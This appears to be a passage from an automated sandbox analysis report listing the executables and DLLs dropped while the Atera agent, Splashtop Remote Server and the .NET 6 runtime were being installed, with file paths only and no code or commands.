                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdscale.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Core.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdbook.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.ILGeneration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\EvtLogProvider\stevt_srs_x64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\my_setup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA0BF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUpdate.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDxgiCaptor.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9F94.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Security.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Brotli.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6833.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.DataAnnotations.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcelt-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUACCheck.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdsmplui.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDCAB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Immutable.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSocketCtrl.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DD5.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\Mirror2Extend.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF4AD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libx264-116.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{B7C5EA94-B96A-41F5-BE95-25D78B486678}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\ISRT.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\system32\SRCredentialProvider.dll (copy)Jump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppFileHound.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\stprintmon.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAgent.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3352.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAudioChat.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC672.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\dbgshim.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcurl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\sthid.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\setupdrv.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
